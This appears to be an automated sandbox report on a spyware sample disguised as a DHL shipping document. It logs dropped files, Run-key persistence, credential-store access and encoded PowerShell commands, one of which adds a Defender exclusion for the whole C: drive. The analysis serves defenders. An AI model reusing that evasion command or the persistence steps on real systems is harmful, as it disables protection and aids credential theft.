                  Source: DHL_Shipping_Document2.exe, 00000000.00000003.378760182.000001991D412000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BF6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000003.378760182.000001991D3BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFmdxqenedkdyqyti.dll" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exeBinary or memory string: OriginalFilenameDHL Shipping Document2.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exeReversingLabs: Detection: 38%
                  Source: DHL_Shipping_Document2.exeVirustotal: Detection: 33%
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile read: C:\Users\user\Desktop\DHL_Shipping_Document2.exeJump to behavior
                  Source: DHL_Shipping_Document2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\DHL_Shipping_Document2.exe C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe"
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\explorers.exe "C:\Users\user\AppData\Local\explorers.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\explorers.exe "C:\Users\user\AppData\Local\explorers.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\explorers.exeJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/19@19/6
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: Nuaaqwldle.tmpdb.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHL_Shipping_Document2.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\explorers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2072:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: DHL_Shipping_Document2.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DHL_Shipping_Document2.exeStatic file information: File size 2802176 > 1048576
                  Source: DHL_Shipping_Document2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DHL_Shipping_Document2.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29e400
                  Source: DHL_Shipping_Document2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256 source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Doxfkywupn.pdb source: InstallUtil.exe, 00000011.00000002.556335374.00000294205D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: InstallUtil.exe, 00000011.00000002.552825754.0000029417F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.000002941804D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C7216 pushad ; iretd 0_2_00007FFBAD3C724D
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C724E push eax; iretd 0_2_00007FFBAD3C725D
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFDACA push ebp; iretd 23_2_00DFDACC
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\explorers.exeJump to dropped file
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeFile created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeJump to dropped file

                  Boot Survival

                  barindex
                  Creates multiple autostart registry keys
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
